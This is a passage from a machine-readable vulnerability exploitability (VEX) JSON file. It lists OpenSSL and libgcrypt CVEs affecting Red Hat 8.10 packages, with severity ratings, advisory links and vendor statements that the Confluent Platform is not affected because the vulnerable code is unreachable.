          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50093"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50094"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50096"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50098"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50099"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50100"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50101"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50102"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5399"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2025-15699.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:15699"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9fv-h47r-823f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07272b05b04836a762b4baa874958af51d513844"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2af62e74fb59bc469506bc37eb2990ea408d9467"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/392dcb336405a0c94486aa6655057f59fd3a0902"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4b1cb94a734a7d4ec363ac0a215a25c181e11f65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77c608f4c8857e63e98e66444e2e761c9627916f"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/0d5fd1ab987f7571e2c955d8d8b638fc0fb54ded"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/a2639000db19878d5d89586ae7b725080592ae86"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-13176.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-16046.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13176"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250120.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7264-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7278-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2025.html#AppendixMSQL"
        }
      ],
      "published": "2025-01-20T14:15:26+00:00",
      "updated": "2026-06-17T07:01:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-2236",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-2236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:9404"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:3530"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:3534"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-2236"
        },
        {
          "url": "https://bugzilla.redhat.com/2245218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268268"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2236"
        },
        {
          "url": "https://dev.gnupg.org/T7136"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-9404.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:9404"
        },
        {
          "url": "https://github.com/tomato42/marvin-toolkit/tree/master/example/libgcrypt"
        },
        {
          "url": "https://gitlab.com/redhat-crypto/libgcrypt/libgcrypt-mirror/-/merge_requests/17"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-2236.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-9404.html"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gcrypt-devel/2024-March/005607.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2236"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
        }
      ],
      "published": "2024-03-06T22:15:57+00:00",
      "updated": "2026-06-17T07:24:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2024-2511",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1325
      ],
      "description": "Issue summary: Some non-default TLS server configurations can cause unbounded\nmemory growth when processing TLSv1.3 sessions\n\nImpact summary: An attacker may exploit certain server configurations to trigger\nunbounded memory growth that would lead to a Denial of Service\n\nThis problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option is\nbeing used (but not if early_data support is also configured and the default\nanti-replay protection is in use). In this case, under certain conditions, the\nsession cache can get into an incorrect state and it will fail to flush properly\nas it fills. The session cache will continue to grow in an unbounded manner. A\nmalicious client could deliberately create the scenario for this failure to\nforce a Denial of Service. It may also happen by accident in normal operation.\n\nThis issue only affects TLS servers supporting TLSv1.3. It does not affect TLS\nclients.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. OpenSSL\n1.0.2 is also not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-2511"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/08/5"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:9333"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-2511"
        },
        {
          "url": "https://bugzilla.redhat.com/2274020"
        },
        {
          "url": "https://bugzilla.redhat.com/2281029"
        },
        {
          "url": "https://bugzilla.redhat.com/2283757"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274020"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2281029"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-354112.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-398330.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-613116.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-769027.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-915275.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2511"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4603"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4741"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-9333.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:9333"
        },
        {
          "url": "https://github.com/advisories/GHSA-299c-jvhc-gxj8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7e4d731b1c07201ad9374c1cd9ac5263bdf35bce"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/b52867a9f618bb955bed2a3ce3db4d4f97ed8e5d"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/e9d7083e241670332e0443da0f0d4ffb52829f08"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/5f8d25770ae6437db119dfc951e207271a326640"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-2511.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-9333.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00033.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00000.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2511"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240503-0013"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240503-0013/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6937-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20240408.txt"
        },
        {
          "url": "https://www.openssl.org/news/vulnerabilities.html"
        }
      ],
      "published": "2024-04-08T14:15:07+00:00",
      "updated": "2026-06-17T07:24:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
